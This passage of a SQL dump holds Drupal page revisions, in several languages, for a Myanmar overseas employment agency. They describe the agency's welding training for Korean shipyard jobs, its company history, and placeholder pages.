('activities', 0, 19, 125, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-28-58-368.jpg\" data-entity-uuid=\"c67a7f8d-4d56-4cbd-8e31-13d5992592fc\" data-entity-type=\"file\">Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 19, 125, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-28-58-368.jpg\" data-entity-uuid=\"c67a7f8d-4d56-4cbd-8e31-13d5992592fc\" data-entity-type=\"file\">Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 19, 126, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-28-58-368.jpg\" data-entity-uuid=\"c67a7f8d-4d56-4cbd-8e31-13d5992592fc\" data-entity-type=\"file\">Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 19, 126, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-28-58-368.jpg\" data-entity-uuid=\"c67a7f8d-4d56-4cbd-8e31-13d5992592fc\" data-entity-type=\"file\">Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 19, 126, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-28-58-368.jpg\" data-entity-uuid=\"c67a7f8d-4d56-4cbd-8e31-13d5992592fc\" data-entity-type=\"file\">Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 19, 186, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-28-58-368.jpg\" data-entity-uuid=\"c67a7f8d-4d56-4cbd-8e31-13d5992592fc\" data-entity-type=\"file\">Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 19, 186, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-28-58-368.jpg\" data-entity-uuid=\"c67a7f8d-4d56-4cbd-8e31-13d5992592fc\" data-entity-type=\"file\"></p><p>第1バッチから60人以上の方が、溶接技術者のE 7-3ビザポジションで韓国に行くためのKOSHIPAスキルテストの受験登録にやってきました。</p><p>ニュー コメット トレーディング エージェンシー 株式会社 (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 19, 186, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-28-58-368.jpg\" data-entity-uuid=\"c67a7f8d-4d56-4cbd-8e31-13d5992592fc\" data-entity-type=\"file\">Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 20, 66, 'en', 0, '<p><img data-entity-uuid=\"33b923ac-f2d3-4758-958d-c78ef6f25db1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-31-19-935.jpg\">အပတ်စဉ်(၂)ဒုတိယအသုတ်ဂဟေဆော်သင်တန်းသားများအမှတ်တရ(၁၉-၆-၂၀၂၃)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 20, 84, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-31-19-935.jpg\" data-entity-uuid=\"33b923ac-f2d3-4758-958d-c78ef6f25db1\" data-entity-type=\"file\">Memorial Photo of 2nd Batch Welding Students (19-6-2023)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 20, 123, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-31-19-935.jpg\" data-entity-uuid=\"33b923ac-f2d3-4758-958d-c78ef6f25db1\" data-entity-type=\"file\">Memorial Photo of 2nd Batch Welding Students (19-6-2023)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 20, 123, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-31-19-935.jpg\" data-entity-uuid=\"33b923ac-f2d3-4758-958d-c78ef6f25db1\" data-entity-type=\"file\">Memorial Photo of 2nd Batch Welding Students (19-6-2023)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 20, 124, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-31-19-935.jpg\" data-entity-uuid=\"33b923ac-f2d3-4758-958d-c78ef6f25db1\" data-entity-type=\"file\">Memorial Photo of 2nd Batch Welding Students (19-6-2023)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 20, 124, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-31-19-935.jpg\" data-entity-uuid=\"33b923ac-f2d3-4758-958d-c78ef6f25db1\" data-entity-type=\"file\">Memorial Photo of 2nd Batch Welding Students (19-6-2023)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 20, 124, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-31-19-935.jpg\" data-entity-uuid=\"33b923ac-f2d3-4758-958d-c78ef6f25db1\" data-entity-type=\"file\">Memorial Photo of 2nd Batch Welding Students (19-6-2023)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 20, 185, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-31-19-935.jpg\" data-entity-uuid=\"33b923ac-f2d3-4758-958d-c78ef6f25db1\" data-entity-type=\"file\">Memorial Photo of 2nd Batch Welding Students (19-6-2023)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 20, 185, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-31-19-935.jpg\" data-entity-uuid=\"33b923ac-f2d3-4758-958d-c78ef6f25db1\" data-entity-type=\"file\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong>第</strong></span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\"><strong>2</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong>回生　研修生達と記念</strong></span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong>（</strong></span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\"><strong>2023</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong>年</strong></span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\"><strong>6</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong>月</strong></span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\"><strong>20</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong>日）</strong></span><o:p></o:p></p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 20, 185, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-31-19-935.jpg\" data-entity-uuid=\"33b923ac-f2d3-4758-958d-c78ef6f25db1\" data-entity-type=\"file\">Memorial Photo of 2nd Batch Welding Students (19-6-2023)</p><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 23, 93, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 94, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 94, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 95, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 95, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 95, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 98, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 98, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 98, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 108, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 108, 'ja', 0, '<p>jComing soon...</p>', '', 'full_html'),
('page', 0, 23, 108, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 109, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 109, 'ja', 0, '<p>jComing soon...</p>', '', 'full_html'),
('page', 0, 23, 109, 'ko', 0, '<p>kComing soon...</p>', '', 'full_html'),
('page', 0, 23, 138, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 138, 'ja', 0, '<p>jComing soon...</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 138, 'ko', 0, '<p class=\"text-align-justify MsoListParagraphCxSpFirst\" style=\"margin-left:.75in;mso-add-space:auto;\"><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\">&nbsp;</p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\"><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) license was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\">&nbsp;</p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\"><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\">&nbsp;</p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\"><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span><o:p></o:p></p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\">&nbsp;</p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\"><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</span><o:p></o:p></p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\">&nbsp;</p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\"><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\">&nbsp;</p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\"><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</span><o:p></o:p></p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\">&nbsp;</p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\"><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p class=\"text-align-justify MsoListParagraphCxSpMiddle\" style=\"margin-left:.75in;mso-add-space:auto;\">&nbsp;</p><p class=\"text-align-justify MsoListParagraphCxSpLast\" style=\"margin-left:.75in;mso-add-space:auto;\"><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 143, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 23, 143, 'ja', 0, '<p>jComing soon...</p>', '', 'full_html'),
('page', 0, 23, 143, 'ko', 0, '<p class=\"text-align-justify MsoListParagraphCxSpLast\" style=\"margin-left:.75in;mso-add-space:auto;\">Coming soon<o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 156, 'en', 0, '<p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p>', '', 'full_html'),
('page', 0, 23, 156, 'ja', 0, '<p>jComing soon...</p>', '', 'full_html'),
('page', 0, 23, 156, 'ko', 0, '<p class=\"text-align-justify MsoListParagraphCxSpLast\" style=\"margin-left:.75in;mso-add-space:auto;\">Coming soon<o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 157, 'en', 0, '<p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p>', '', 'full_html'),
('page', 0, 23, 157, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">当社は</span><span style=\"mso-bidi-font-size:10.5pt;\">2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年に設立し、登録</span><span style=\"mso-bidi-font-size:10.5pt;\">ID(295/2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ー</span><span style=\"mso-bidi-font-size:10.5pt;\">2005)</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"mso-bidi-font-size:10.5pt;\">2023</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"mso-bidi-font-size:10.5pt;\">.</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"mso-bidi-font-size:10.5pt;\">25</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span style=\"mso-bidi-font-size:10.5pt;\">100</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"mso-bidi-font-size:10.5pt;\">200</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">現在、ニューコメットトレンディグエイジェンシーでは韓国の造船所で働きたいミャンマー全国から民族問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT, NAT-TEST, TOP-J)<span lang=\"JA\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 157, 'ko', 0, '<p class=\"text-align-justify MsoListParagraphCxSpLast\" style=\"margin-left:.75in;mso-add-space:auto;\">Coming soon<o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 160, 'en', 0, '<p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p>', '', 'full_html'),
('page', 0, 23, 160, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">当社は</span><span style=\"mso-bidi-font-size:10.5pt;\">2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年に設立し、登録</span><span style=\"mso-bidi-font-size:10.5pt;\">ID(295/2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ー</span><span style=\"mso-bidi-font-size:10.5pt;\">2005)</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"mso-bidi-font-size:10.5pt;\">2023</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"mso-bidi-font-size:10.5pt;\">.</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"mso-bidi-font-size:10.5pt;\">25</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span style=\"mso-bidi-font-size:10.5pt;\">100</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"mso-bidi-font-size:10.5pt;\">200</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">現在、ニューコメットトレンディグエイジェンシーでは韓国の造船所で働きたいミャンマー全国から民族問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT, NAT-TEST, TOP-J)<span lang=\"JA\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span 